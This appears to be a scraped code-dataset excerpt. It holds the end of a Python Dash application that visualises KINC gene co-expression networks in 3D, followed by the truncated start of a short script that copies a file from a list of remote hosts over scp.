= pd.Series(list(samples))\n sizes = sizes.replace(to_replace=r'[^1]', value='5', regex=True)\n sizes = sizes.replace({'1': '10'})\n sizes = sizes.astype('int')\n sizes.index = sdata.index\n\n # Generate the colors for the samples.\n if (color_col == None):\n color_col = 'Cluster'\n\n # If the column is 'Cluster' we need to add it to the dataframe. The\n # Cluster column simply lists if the sample is in the cluster or not.\n if (color_col == 'Cluster'):\n inout = pd.Series(list(samples))\n inout = inout.replace(to_replace=r'[^1]', value='Out', regex=True)\n inout = inout.replace({'1': 'In'})\n inout.index = gem.columns\n sdata = pd.concat([sdata, inout.rename('Cluster')], 1)\n\n # Is this a categorical column?\n is_categorical = False\n categories = sdata[color_col].unique()\n if (categories.dtype == object):\n is_categorical = True\n\n # Now draw the plot\n nticks = None\n tickmode = 'auto'\n ticktext = None\n tickvals = None\n if is_categorical:\n num_categories = categories.shape[0]\n tickmode = 'array'\n ticktext = categories\n tickvals = np.arange(0, num_categories) / (num_categories - 1) - 0.5\n replace_df = pd.DataFrame({'Categories' : categories,'Z' : tickvals})\n sdata['Z'] = sdata[color_col].replace(\n to_replace=replace_df['Categories'].values,\n value=replace_df['Z'].values)\n\n nticks = num_categories\n showlegend = True\n first_category = (sdata[color_col] == categories[0])\n fig2 = go.Figure(data=[go.Scatter3d(x=sdata[first_category]['X'],\n z=sdata[first_category]['Y'],y=sdata[first_category]['Z'],\n mode='markers',\n marker=dict(symbol='circle', size=sizes[first_category]),\n text= sdata[first_category].index, hoverinfo='text',\n name=str(categories[0]))])\n\n for i in range(1, len(categories)):\n next_category = (sdata[color_col] == categories[i])\n fig2.add_trace(go.Scatter3d(x=sdata[next_category]['X'],\n z=sdata[next_category]['Y'], y=sdata[next_category]['Z'],\n mode='markers',\n marker=dict(symbol='circle',size=sizes[next_category]),\n text= sdata[next_category].index,\n hoverinfo='text', name=str(categories[i])))\n else:\n num_categories = None\n sdata['Z'] = sdata[color_col]\n tickvals = []\n showlegend = False\n fig2 = go.Figure(data=[go.Scatter3d(x=sdata['X'], z=sdata['Y'], y=sdata['Z'],\n mode='markers',\n marker=dict(symbol='circle', size=sizes,\n color=sdata['Z'], colorscale='Viridis'),\n text= sdata.index, hoverinfo='text')])\n\n fig2.update_layout(\n height=400,\n title=\"\",\n showlegend=showlegend,\n legend={'itemsizing': 'constant'},\n margin=dict(l=10, r=10, t=0, b=10),\n scene=dict(\n aspectmode=\"cube\",\n xaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=node1,\n showspikes=True),\n zaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=node2,\n showspikes=True),\n yaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=color_col,\n tickmode=tickmode, ticktext=ticktext, tickvals=tickvals, nticks=nticks, showspikes=True),\n ),\n hovermode='closest',\n annotations=[dict(showarrow=False,\n text=\"\",\n xref='paper', yref='paper',\n x=0, y=0.1, xanchor='left', yanchor='bottom', font=dict(size=14))\n ],\n datarevision = time.time()\n )\n\n fig2.layout.scene.camera.projection.type = \"orthographic\"\n fig2.layout.scene.camera.eye = dict(x=0, y=-1, z=0)\n\n return fig2\n\n\n\n\n\ndef create_network_stats_table(net):\n \"\"\"\n Construts the HTML table that holds information about the network.\n\n net : the network data frame.\n \"\"\"\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '60%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n div_children = []\n table_rows = []\n\n num_edges = net.shape[0]\n unique_edges = net.loc[:,('Source', 'Target')].drop_duplicates().shape[0]\n num_nodes = len(pd.concat([net['Source'], net['Target']]).unique())\n\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '0px', 'width' : '100%',\n 'margin-bottom' : '0px'\n },\n children=[\n html.Tr([\n html.Th('Total Edges', style=htd_style),\n html.Td(num_edges, style=td_style)\n ]),\n html.Tr([\n html.Th('Unique Edges', style=htd_style),\n html.Td(unique_edges, style=td_style)\n ]),\n html.Tr([\n html.Th('Number of Nodes', style=htd_style),\n html.Td(num_nodes, style=td_style)\n ])\n ]\n )\n )\n\n return html.Div(\n id='network-stats-table',\n children = div_children,\n )\n\n\ndef create_dash_edge_table(net, edge_index = None):\n \"\"\"\n Constructs the HTML table that holds edge information for the Dash appself.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n edge_index : The numerical index of the edge in the elayers dataframe\n that is to be plotted.\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n net_fixed = net.drop(['Samples', 'Edge_Bin', 'Pval_Bin', 'Rsqr_Bin', 'Relationship'], axis=1)\n if ('HPval_Bin' in net_fixed.columns):\n net_fixed = net_fixed.drop(['HPval_Bin'], axis=1)\n for colname in net_fixed.columns:\n if ('p_value' in colname):\n net_fixed[colname] = net_fixed[colname].apply(np.format_float_scientific, precision=4)\n\n columns = net_fixed.columns\n div_children = []\n if not edge_index == None:\n row_vals = net_fixed.iloc[edge_index]\n source = row_vals['Source']\n target = row_vals['Target']\n div_children.append(html.Label(\n '{source} (co) {target}'.format(source = source, target=target),\n style = {'padding' : '0px', 'margin' : '0px'}\n ))\n div_children.append(html.Br())\n row_vals = net_fixed[(net_fixed['Source'] == source) & (net_fixed['Target'] == target)]\n for index, row in row_vals.iterrows():\n table_rows = []\n for col in columns:\n if col == \"Source\" or col == \"Target\":\n continue\n\n table_rows.append(\n html.Tr([\n html.Th(col, style=htd_style),\n html.Td(row[col], style=td_style)\n ])\n )\n div_children.append(\n html.Label('Edge #{index}'.format(index = index)))\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '10px', 'margin-bottom' : '0px',\n 'width' : '100%',\n },\n children=table_rows\n )\n )\n else:\n div_children.append(\n html.Div('To view edge details, click an edge in the network.')\n )\n\n return html.Div(\n id='edge-table',\n children = div_children,\n )\n\n\n\n\n\ndef create_dash_sample_table(net, amx, sample = None):\n \"\"\"\n Constructs the HTML table that holds sample information for the Dash appself.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n sample : The name of the sample to display\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n columns = amx.columns\n div_children = []\n if sample:\n div_children.append(html.H4(\n children = ['Sample: {sample}'.format(sample = sample)],\n style = {'padding' : '0px', 'margin' : '0px'}\n ))\n table_rows = []\n row = amx.loc[sample]\n for col in columns:\n table_rows.append(\n html.Tr([\n html.Th(col, style=htd_style),\n html.Td(row[col], style=td_style)\n ])\n )\n\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '10px',\n 'margin-bottom' : '10px', 'width' : '100%',\n },\n children=table_rows\n )\n )\n else:\n div_children.append(\n html.Div('To view sample details, click an edge in the network, then in the edge scatterplot click a sample.')\n )\n\n return html.Div(\n id='sample-table',\n children = div_children\n )\n\n\n\n\n\ndef create_dash_node_table(net, nmeta, vlayers, node = None):\n \"\"\"\n Constructs the HTML table that holds node information for the Dash app.\n\n net : The network dataframe created by the load_network function.\n\n nmeta : The dataframe containing the node metadata.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n node : The name of the node to display\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n div_children = []\n table_rows = []\n if not node is None:\n table_rows.append(\n html.Tr([\n html.Th('Name', style=htd_style),\n html.Td(node, style=td_style)\n ])\n )\n table_rows.append(\n html.Tr([\n html.Th('Degree', style=htd_style),\n html.Td(vlayers.loc[vlayers['Vertex'] == node, 'Degree'].unique(), style=td_style)\n ])\n )\n if not nmeta is None:\n columns = nmeta.columns\n if not nmeta is None:\n rows = nmeta.loc[node]\n for index, row in rows.iterrows():\n table_rows.append(\n html.Tr([\n html.Th(\n colSpan = 2,\n children=[\n html.Label(\n \"{term}\".format(term = row['Term']),\n style= {'font-weight' : 'bold'}\n ),\n html.Div(\n row['Definition'],\n style= {'font-weight' : 'normal'})\n ],\n style=htd_style,\n )\n ])\n )\n else:\n div_children.append(\n html.Div('There is no additional information about this node.')\n )\n else:\n div_children.append(\n html.Div('There are no node meta data provided. Use the --nmeta option to load node data when running this application.')\n )\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '0px',\n 'margin-bottom' : '0px', 'width' : '100%',\n },\n children=table_rows\n )\n )\n else:\n div_children.append(\n html.Div('To view node details, click a node in the network.')\n )\n\n return html.Div(\n id='node-table',\n children = div_children\n )\n\n\n\n\n\n\ndef create_condition_select(amx, sample_col = 'Cluster'):\n \"\"\"\n Creates a Dash select dropdown for selecting the condition to view.\n\n This dropbox is intended to change the 3D co-expression scatterplot.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n color_col : The name of the column in the amx that contains the category\n that should be used for coloring the points in the plot.\n\n return : A Dash dcc.Dropdown object.\n\n \"\"\"\n columns = np.sort(amx.columns.values)\n\n # Holds the list of columns to keep.\n keep = []\n keep.append('Cluster')\n\n # Exclude any columns with just a single value or any columns with as\n # many unique values as there are elements\n for col in columns:\n if len(amx[col].dropna().unique()) <= 1:\n continue\n if len(amx[col].dropna().unique()) == amx[col].size:\n continue\n keep.append(col)\n\n # Build the select element.\n select = dcc.Dropdown(\n id = 'coexp-condition-select',\n style = {'color' : 'black'},\n options = [\n {'label' : col, 'value' : col} for col in keep\n ],\n value = 'Cluster'\n )\n return select\n\n\n\n\n\ndef create_edge_color_select(net):\n \"\"\"\n Creates a Dash select dropdown for selecting the network attribute to view.\n\n This dropbox is intended to change the 3D network layout view.\n\n net : The network dataframe created by the load_network function.\n\n return : A Dash dcc.Dropdown object.\n\n \"\"\"\n\n options = ['Score']\n if 'p_value' in net.columns:\n options.append('P-value')\n if 'hotelling_p_value' in net.columns:\n options.append('Hotelling P-value (phased)')\n if 'Test_Name' in net.columns:\n options.append('Test Name')\n if 'r_squared' in net.columns:\n options.append('R^2')\n options.append('Relationship')\n\n select = dcc.Dropdown(\n id = 'edge-color-select',\n style = {\n 'color' : 'black'\n },\n options = [\n {'label' : col, 'value' : col} for col in options\n ],\n value = 'Score'\n )\n return select\n\n\n\n\n\n\ndef create_edge_layer_select(net):\n \"\"\"\n Creates a Dash select dropdown for selecting the network attribute to view.\n\n This dropbox is intended to change the 3D network layout view.\n\n net : The network dataframe created by the load_network function.\n\n return : A Dash dcc.Dropdown object.\n\n \"\"\"\n\n options = ['Score']\n if 'p_value' in net.columns:\n options.append('P-value')\n if 'hotelling_p_value' in net.columns:\n options.append('Hotelling P-value (phased)')\n if 'Test_Name' in net.columns:\n options.append('Test Name')\n if 'r_squared' in net.columns:\n options.append('R^2')\n options.append('Relationship')\n\n select = dcc.Dropdown(\n id = 'edge-layer-select',\n style = {\n 'color' : 'black'\n },\n options = [\n {'label' : col, 'value' : col} for col in options\n ],\n value = 'Score'\n )\n return select\n\n\n\n\n\ndef build_sidebar_box_header(title, id_prefix):\n\n return html.Div(\n style = {\n 'background-color' : '#555555', 'color' : 'white',\n 'margin': '0px', 'padding':'10px',\n \"border-radius\": \"5px\"},\n children = [\n html.H3(\n children = [title],\n style = {\n 'float' : 'left',\n 'padding' : '0px', 'margin' : '0px 0px 0px 0'\n }\n ),\n html.Button(\n 'toggle',\n id=\"{prefix}-toggle\".format(prefix=id_prefix),\n n_clicks=0,\n # src=\"https://img.icons8.com/officexs/32/000000/open-view.png\",\n style={\n \"height\" : \"20px\", \"float\" : \"right\",\n 'padding' : '0px', 'margin' : '0px 0px 0px 0'\n }\n ),\n html.Div(style ={'clear' : 'both'})\n ]\n )\n\n\n\n\n\ndef write_to_data_uri(s):\n \"\"\"\n Writes to a uri.\n Use this function to embed javascript into the dash app.\n Adapted from the suggestion by user 'mccalluc' found here:\n https://community.plotly.com/t/problem-of-linking-local-javascript-file/6955/2\n \"\"\"\n uri = (\n ('data:;base64,').encode('utf8') +\n base64.urlsafe_b64encode(s.encode('utf8'))\n ).decode(\"utf-8\", \"strict\")\n return uri\n\n\n\n\n\ndef build_application(net, gem, amx, nmeta, vlayers, elayers, sample_col,\n net_name):\n\n \"\"\"\n Creates the Dash application.\n\n The Dash application will provide all of the interactive plots, tables and\n filters to interacitvely exploring the network.\n\n net : The network dataframe created by the load_network function.\n\n gem : The GEM dataframe created by the load_gem function.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n nmeta : The dataframe containing the node metadata.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n sample_col : The name of the column in the amx that contains the sample\n name.\n\n net_name : The name of the network to display.\n\n\n return : The Dash application object.\n \"\"\"\n\n sidebar_box_style = {\n \"float\" : \"left\", \"width\" : \"100%\", \"color\" : \"black\",\n \"padding\" : \"0px\", \"margin-bottom\" : \"10px\",\n \"background-color\" : \"#CCCCCC\",\n \"border-radius\": \"5px\"\n }\n\n internal_js = write_to_data_uri(\"\"\"\n \"\"\")\n\n external_scripts = [\n 'https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js',\n internal_js,\n ]\n external_stylesheets = [\n ]\n app = dash.Dash(__name__,\n external_scripts=external_scripts,\n external_stylesheets=external_stylesheets\n )\n app.scripts.config.serve_locally = False\n app.layout = html.Div(\n style = {\n \"padding\" : \"0px\", \"background-color\" :\n \"black\", \"margin\" : \"0px\", \"color\" : \"white\",\n \"width\" : \"100%\", \"height\" : \"100vh\"\n },\n children = [\n # Graph Row\n html.Div(\n style = {\n \"border\" : \"0px solid white\", \"padding\" : \"15px\",\n \"background-color\" : \"black\", \"margin\" : \"0px\",\n },\n children=[\n dcc.Graph(\n id = 'network-3dview',\n style = {\n \"height\" : \"100vh\"\n },\n figure = create_network_plot(net, vlayers, elayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_network_view',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 2\n }\n }\n ),\n dcc.Input(\n id='current-network-3dview-camera',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n ),\n dcc.Input(\n id='current-network-3dview-aspect',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n )\n ]\n ),\n # Header Row\n html.Div(\n id = \"header\",\n style={\n \"position\" : \"fixed\", \"left\" : \"30px\", \"top\" : \"20px\",\n 'padding' : '0px', \"margin\" : \"0px\",\n },\n children=[\n html.Img(\n src=\"https://raw.githubusercontent.com/SystemsGenetics/KINC/master/docs/images/kinc.png\",\n style={\n \"height\" : \"55px\",\"display\" : \"inline-block\",\n \"padding\" : \"0px\", \"margin\" : \"0px 10px 0px 10px\"}),\n html.H1(children=\"3D Network Explorer\",\n style={\n \"display\" : \"inline-block\", \"padding\" : \"10px 0px 0px 0px\",\n \"margin\" : \"0px\", \"vertical-align\" : \"top\"}),\n html.Div(children=\"Network name: \" + net_name,\n style={\"padding\" : \"0px 0px 0px 10px\"}),\n ]\n ),\n # Left Sidebar\n html.Div(\n style={\n \"position\" : \"fixed\", \"left\" : \"30px\", \"top\" : \"120px\",\n 'padding' : '0px 10px 0px 0px', \"margin\" : \"0px\",\n \"width\" : \"400px\", \"height\" : \"80vh\", 'overflow-y': 'auto',\n \"scrollbar-color\" : \"dark\"\n },\n children = [\n # Edge Color and Layer selection boxes.\n html.Div(\n id='edge-select-box',\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Layout and Colors\", 'edge-select-box'),\n html.Div(\n id='edge-select-box-contents',\n style={'margin' : '0px', 'display' : 'none', 'padding' : '10px'},\n children = [\n html.Label('Color Edges By'),\n create_edge_color_select(net),\n html.Label('Layer Edges By'),\n create_edge_layer_select(net)\n ]\n )\n ]\n ),\n # Node Details\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Node Details\", 'node-table-box'),\n html.Div(\n id=\"node-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_node_table(net, nmeta, vlayers)]\n ),\n ]\n ),\n # Edge Table\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Edge Details\", 'edge-table-box'),\n html.Div(\n id=\"edge-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_edge_table(net)]\n ),\n ]\n ),\n # 3D Co-Expression scatterplot row\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Edge Scatterplot\", 'scatterplot-box'),\n html.Div(\n id='scatterplot-box-contents',\n style={'margin' : '0px', 'display' : 'none'},\n children = [\n html.Div(\n style={'padding-bottom' : '10px'},\n children=[\n html.Label('Color Samples By'),\n create_condition_select(amx, sample_col)\n ],\n ),\n dcc.Graph(\n id = 'edge-expression-3dview',\n figure = create_expression_scatterplot(gem, amx, elayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_expression_scatterplot',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n ]\n )\n ]\n ),\n # Sample Details\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Sample Details\", 'sample-table-box'),\n html.Div(\n id=\"sample-table-box-contents\",\n style={'margin' : '0px', 'visibility' : 'hidden'},\n children=[create_dash_sample_table(net, amx)]\n ),\n ]\n ),\n # network stats\n html.Div(\n style=sidebar_box_style,\n children=[\n build_sidebar_box_header(\"Network Stats\", 'network-stats-box'),\n html.Div(\n id='network-stats-box-contents',\n style={'margin' : '0px', 'padding' : '10px'},\n children = [\n create_network_stats_table(net),\n dcc.Graph(\n id = 'degree-distribution-plot',\n figure = create_degree_distribution_plot(vlayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_degree_distribution',\n 'width': 800,\n 'height': 800,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n dcc.Graph(\n id = 'avg-cc-distribution-plot',\n figure = create_avg_cc_distribution_plot(vlayers),\n config = {\n 'toImageButtonOptions' : {\n 'filename': 'kinc_3d_average_cc_distribution',\n 'width': 800,\n 'height': 600,\n 'format': 'svg',\n 'scale' : 1\n }\n },\n ),\n ]\n )\n ]\n ),\n ],\n ),\n dcc.Input(\n id='current-expr-camera-coords',\n type=\"number\",\n value=0,\n style= {'display' : 'none'}\n )\n ] # End app layout children\n ) # End app layout\n\n\n # Callback when an object in the network plot is clicked.\n @app.callback(\n [dash.dependencies.Output('edge-expression-3dview', 'figure'),\n dash.dependencies.Output('edge-table', 'children'),\n dash.dependencies.Output('node-table', 'children')],\n [dash.dependencies.Input('network-3dview', 'clickData'),\n dash.dependencies.Input('coexp-condition-select', 'value')],\n [dash.dependencies.State('edge-expression-3dview', 'figure')])\n def set_current_edge(clickData, color_col, figure):\n edge_index = None\n node = None\n if (clickData):\n scatterplot = figure\n node_table = None\n edge_table = None\n points = clickData['points']\n efound = re.match('^Edge: (.*?) \\(co\\) (.*?)$', points[0]['text'])\n nfound = re.match('^Node: (.*?)$', points[0]['text'])\n if (efound):\n edge_index = points[0]['customdata']\n row_vals = elayers.iloc[edge_index]\n source = row_vals['Source']\n target = row_vals['Target']\n edge_nodes = [source, target]\n scatterplot = create_expression_scatterplot(gem, amx, elayers, color_col, edge_index)\n edge_table = create_dash_edge_table(net, edge_index)\n node_table = create_dash_node_table(net, nmeta, vlayers, None)\n if (nfound):\n node = edge_index = points[0]['customdata']\n node_table = create_dash_node_table(net, nmeta, vlayers, node)\n edge_table = create_dash_edge_table(net, None)\n\n return [scatterplot, edge_table, node_table]\n\n\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n [dash.dependencies.Output('sample-table', 'children')],\n [dash.dependencies.Input('edge-expression-3dview', 'clickData')])\n def update_sample_table(clickData):\n if (clickData):\n sample = clickData['points'][0]['text']\n return [create_dash_sample_table(net, amx, sample)]\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n dash.dependencies.Output('current-network-3dview-camera', 'value'),\n [dash.dependencies.Input('network-3dview', 'relayoutData')])\n def set_current_camera(relayoutData):\n if (relayoutData):\n if 'scene.camera' in relayoutData.keys():\n camera = json.dumps(relayoutData[\"scene.camera\"])\n return camera\n raise dash.exceptions.PreventUpdate\n\n @app.callback(\n dash.dependencies.Output('current-network-3dview-aspect', 'value'),\n [dash.dependencies.Input('network-3dview', 'relayoutData')])\n def set_network_aspect(relayoutData):\n if (relayoutData):\n if 'scene.aspectratio' in relayoutData.keys():\n aspect = json.dumps(relayoutData[\"scene.aspectratio\"])\n return aspect\n raise dash.exceptions.PreventUpdate\n\n\n @app.callback(\n dash.dependencies.Output('network-3dview', 'figure'),\n [dash.dependencies.Input('edge-color-select', 'value'),\n dash.dependencies.Input('edge-layer-select', 'value')],\n [dash.dependencies.State('current-network-3dview-camera', 'value'),\n dash.dependencies.State('current-network-3dview-aspect', 'value')]\n )\n def update_network_plot(color_by, layer_by, camera_vals, aspect_vals):\n camera = None\n aspect = None\n if (type(camera_vals) == str):\n camera = json.loads(camera_vals)\n if (type(aspect_vals) == str):\n aspect = json.loads(aspect_vals)\n\n if not camera and not aspect:\n raise dash.exceptions.PreventUpdate\n\n return create_network_plot(net, vlayers, elayers, color_by, layer_by, camera, aspect)\n\n\n @app.callback(\n dash.dependencies.Output('edge-select-box-contents', 'style'),\n [dash.dependencies.Input('edge-select-box-toggle', 'n_clicks')]\n )\n def toggle_edge_select_box(toggle):\n if (toggle % 2 == 1):\n return {'margin' : '0px', 'visibility' : 'visible', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('scatterplot-box-contents', 'style'),\n [dash.dependencies.Input('scatterplot-box-toggle', 'n_clicks')]\n )\n def toggle_scatterplot_box(toggle):\n if (toggle % 2 == 1):\n return {'margin' : '0px', 'visibility' : 'visible', 'max-height' : '500px', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('sample-table-box-contents', 'style'),\n [dash.dependencies.Input('sample-table-box-toggle', 'n_clicks')]\n )\n def toggle_sample_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n @app.callback(\n dash.dependencies.Output('network-stats-box-contents', 'style'),\n [dash.dependencies.Input('network-stats-box-toggle', 'n_clicks')]\n )\n def toggle_network_stats_box(toggle):\n if (toggle % 2 == 0):\n return {'margin' : '0px', 'visibility' : 'visible', 'padding' : '10px'}\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n @app.callback(\n dash.dependencies.Output('node-table-box-contents', 'style'),\n [dash.dependencies.Input('node-table-box-toggle', 'n_clicks')]\n )\n def toggle_node_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n\n @app.callback(\n dash.dependencies.Output('edge-table-box-contents', 'style'),\n [dash.dependencies.Input('edge-table-box-toggle', 'n_clicks')]\n )\n def toggle_edge_table_box(toggle):\n if (toggle % 2 == 1):\n return {\n 'margin' : '0px', 'visibility' : 'visible',\n 'max-height' : '250px', 'padding' : '10px',\n 'overflow-y': 'auto',\n }\n else:\n return {'margin' : '0px', 'visibility' : 'hidden', 'height' : '0px', 'padding' : '0px'}\n\n return app\n\n\ndef is_port_in_use(port):\n \"\"\"\n Checks if a port is already in use.\n\n port: the desired port to use\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\ndef main():\n \"\"\"\n The main function.\n\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--net', dest='net_path', type=str, required=True, help=\"(required) The path to the KINC-derived network file\")\n parser.add_argument('--emx', dest='gem_path', type=str, required=True, help=\"(retuired) The path to the log2 transformed Gene Expression Matrix or Metabolite abundance matrix.\")\n parser.add_argument('--amx', dest='amx_path', type=str, required=True, help=\"(required) The path to the tab-delimited annotation matrix. The matrix must have at least one column that contains a unique list of sample names.\")\n parser.add_argument('--sample_col', dest='sample_col', type=str, required=False, default='Sample', help=\"(optional) The name of the column in the annotation matrix that contains the unique sample names. Defaults to 'Sample'\")\n parser.add_argument('--nmeta', dest='nmeta', type=str, required=False, help=\"(optional) The path to a tab-delimited node meta data file. The format of the file must have 4 columns, with the first containing the node name, the second a controlled vocabulary term ID, the third the term definition and the fourth the vocubulary name.\")\n parser.add_argument('--debug', dest='debug', action='store_true', default=False, help=\"(optional). Add this argument to enable Dash application debugging mode.\")\n parser.add_argument('--redo-layout', dest='redo_layout', action='store_true', default=False, help=\" (optional). If the 2D and 3D network layout has already been constructed it will be loaded from a file. Add this arugment to force the layouts to be rebuilt and not loaded from the files. To prevent Dash from rerunning the layout on callbacks, this option results in the program terminating. To view the application, restart without this option.\")\n parser.add_argument('--iterations', dest='iterations', type=int, default=100, help=\"(optional). The number of iterations to perform when calculating the Force Atlas2 layout. This argument is only used the first time a network is viewed or if the --redo_layout argument is provided.\")\n args = parser.parse_args()\n\n # Make sure the paths exist\n if not os.path.exists(args.net_path):\n print (\"ERROR: The network file cannot be found: {}\".format(args.net_path))\n exit(1)\n if not os.path.exists(args.gem_path):\n print (\"ERROR: The expression matrix file cannot be found: {}\".format(args.gem_path))\n exit(1)\n if not os.path.exists(args.amx_path):\n print (\"ERROR: The annotation matrix file cannot be found: {}\".format(args.amx_path))\n exit(1)\n if not args.nmeta is None:\n if not os.path.exists(args.nmeta):\n print (\"ERROR: The node metadata file cannot be found: {}\".format(args.nmeta))\n exit(1)\n\n # Load the input data.\n print(\"Reading network file...\")\n net = load_network(args.net_path)\n print(\"Reading GEM file...\")\n gem = load_gem(args.gem_path)\n print(\"Reading experioment annotation file...\")\n amx = load_amx(args.amx_path, args.sample_col)\n\n nmeta = None\n if not args.nmeta is None:\n print(\"Reading the node metadata file...\")\n nmeta = load_node_meta(args.nmeta)\n\n\n # Get the filename of the network file minus the extension.\n (net_prefix, net_ext) = os.path.splitext(os.path.basename(args.net_path))\n\n # Calculate a 2D layout for the network\n glayout = calculate_2d_layout(net, net_prefix, args.redo_layout, args.iterations)\n\n # Calculate the Z-coorinate positions for the verticies and edges.\n bin_edges(net)\n vlayers = get_vertex_zlayers(net, glayout, net_prefix, args.redo_layout)\n elayers = get_edge_zlayers(net, glayout, net_prefix, args.redo_layout)\n\n\n # If the user requested we rebuild the layout then terminate so Dash\n # doesn't try to rebuild the layout on each callback.\n if args.redo_layout:\n print (\"Layouts have been built. Please relaunch without the --redo-layout option to view the app.\")\n exit(0)\n\n # Launch the dash application\n print(\"Launching application...\")\n app = build_application(net, gem, amx, nmeta, vlayers, elayers, args.sample_col, net_prefix)\n\n\n port = 8050\n while(is_port_in_use(port)):\n port = port + 1\n app.run_server(debug=args.debug, port=port)\n\n exit(0)\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/kinc-3d-viewer.py","file_name":"kinc-3d-viewer.py","file_ext":"py","file_size_in_byte":63581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397446359","text":"import argparse\nimport logging\nimport subprocess\n\nfrom typing import Tuple\n\n\ndef solution(file: str, hosts_file: str, log: logging.Logger) -> None:\n try:\n with open(hosts_file, \"r\") as hostsfile:\n hosts = hostsfile.read().splitlines()\n except (IOError, FileNotFoundError) as exception:\n log.error(f\"Error reading from {hosts_file}: {exception}\")\n else:\n for host in hosts:\n try:\n user, server = host.split(\",\")[0], host.split(\",\")[1]\n subprocess.run([\"scp\", f\"{user}@{server}:{file}\", f\"./{user}_{server}_{file}\"])\n except OSError as exception:\n log.error(f\"Error copying file from {host}: {exception}\")\n continue\n\n\ndef setup_logging() -> logging.Logger:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.ERROR)\n file_handle = logging.FileHandler(\"sol_14.log\")\n logger.addHandler(file_handle)\n return logger\n\n\ndef 